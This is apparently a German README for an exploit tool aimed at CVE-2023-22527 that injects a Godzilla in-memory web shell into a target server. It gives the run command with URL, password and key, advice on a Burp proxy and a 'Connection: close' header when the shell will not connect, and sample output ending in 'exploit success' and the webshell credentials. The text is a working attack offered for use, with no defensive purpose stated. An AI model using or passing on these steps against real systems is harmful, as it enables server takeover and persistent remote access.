
CVE-2023-22527 Memory-Shell-Injektionswerkzeug
PS: Getestete Version: 8.5.1, andere Versionen sollten ebenfalls funktionieren, wurden aber nicht getestet
Der Inhalt basiert auf dem vorherigen Tool von Beichen.
java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar url Godzilla-Passwort Godzilla-Schlüssel
Beispiel
java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://xxxx/ pass key
Falls der Memory-Shell erfolgreich injiziert wurde, aber Godzilla keine Verbindung herstellen kann, fügen Sie bitte die folgenden Header zur Anfragekonfiguration hinzu oder konfigurieren Sie einen Burp-Proxy für Godzilla.
Connection: close
$ java -jar .\CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://127.0.0.1:8090/ qaxnb key
[*] Exploit url: http://127.0.0.1:8090/template/aui/text-inline.vm
Response Code: 200
Response Code: 200
[*] send payload
Validate Response Code: 200
[*] exploit success
[*] godzilla webshell password : qaxnb
[*] godzilla webshell key : key
